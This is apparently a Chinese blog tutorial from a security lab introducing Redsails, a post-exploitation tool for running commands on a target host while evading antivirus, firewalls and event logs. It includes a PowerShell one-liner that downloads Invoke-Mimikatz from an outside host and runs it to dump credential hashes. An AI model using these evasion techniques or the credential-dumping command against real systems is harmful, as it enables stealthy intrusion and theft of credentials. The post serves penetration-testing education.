在我们以往的渗透测试中,经常会遇到目标存在杀软,防火墙等防护软件的情况,导致我们的连接不稳定以及连接中断等情况,今天就教大家如何悄无声息的绕过层层防护开启一个愉快的渗透之旅,请抓紧坐好,准备开车了。
Redsails是使用python开发的一款后渗透测试工具,其目的是可以使我们在目标主机上执行命令且无需创建任何事件日志以及网络连接,详细作用如下:
在目标主机持续建立连接
绕过许多常见的事件日志
产生虚假日志/网络流量
Redsails依赖于PyDivert、Pycrypto和WinDivert包,我们可以使用以下命令进行安装:
pip install pydivert
pip install pbkdf2
easy_install pycrypto
在安装pycrypto之前,还需要Microsoft Visual C ++编译器。
创建可执行文件
pip install pyinstaller
pyinstaller-script.py -F --clean redSails.spec
用法
|
这时候神奇的事情发生了,我们看到shell已经连接成功,但是并未建立新的连接,连接端口也一直处于监听状态。
而更加神奇的是即使目标主机上并未开放我们的连接端口,我们也可以正常进行连接,并且不会创建新的连接。
如图,我们使用了22端口进行了连接,但是在目标主机上并未开放22端口,并且也没有任何关于22端口的连接信息。
连接成功之后,我们便可以通过redsails控制台在目标主机上执行系统命令了,执行命令方法如下:
SHELL::net users
SHELL::whoami
SHELL::ipconfig
Redsails也支持PowerShell,因此它可以执行PowerShell命令。
例如我们想对目标的hash进行抓取,我们可以这样调用Powershell脚本来执行:
PSHELL::IEX(New-Object Net.WebClient).Downloadstring('http://192.168.100.2/tmp/Invoke-Mimikatz.ps1');Invoke-Mimikatz
也可以利用powershell与Metasploit进行交互,不过这样就会建立一个新的连接,容易被防护系统检测到。
参考资料:
https://github.com/BeetleChunks/redsails%E2%80%8B%E2%80%8B
新书:《内网安全攻防:渗透测试实战指南》火爆上市!
购买链接:https://item.jd.com/12743210.html
Ms08067安全实验室
专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,2019年11月出版《内网安全攻防:渗透测试实战指南》。目前在编Python渗透测试,JAVA代码审计和逆向工程等方面书籍。
团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。
官方网站:www.ms08067.com